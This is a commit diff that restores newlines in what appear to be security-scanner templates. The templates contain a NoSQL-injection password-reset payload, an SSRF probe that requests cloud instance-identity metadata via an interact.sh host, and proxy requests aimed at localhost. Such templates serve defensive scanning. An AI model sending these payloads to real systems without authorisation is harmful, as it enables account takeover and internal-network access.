Restore newlines

patch-1
sullo 2022-05-09 21:24:35 -04:00
parent 81e77d7423
commit 14423e1220
4 changed files with 10 additions and 1 deletions

View File

@ -23,7 +23,9 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}} Origin: {{BaseURL}}
Content-Type: application/json Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -29,6 +29,7 @@ requests:
- |+ - |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1 GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- alibaba.interact.sh - alibaba.interact.sh

View File

@ -21,21 +21,27 @@ requests:
- |+ - |+
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |+ - |+
GET http://somethingthatdoesnotexist/ HTTP/1.1 GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist Host: somethingthatdoesnotexist
- |+ - |+
GET http://127.0.0.1/ HTTP/1.1 GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1 Host: 127.0.0.1
- |+ - |+
GET https://127.0.0.1/ HTTP/1.1 GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1 Host: 127.0.0.1
- |+ - |+
GET http://localhost/ HTTP/1.1 GET http://localhost/ HTTP/1.1
Host: localhost Host: localhost
- |+ - |+
GET https://localhost/ HTTP/1.1 GET https://localhost/ HTTP/1.1
Host: localhost Host: localhost
unsafe: true unsafe: true
req-condition: true req-condition: true
stop-at-first-match: true stop-at-first-match: true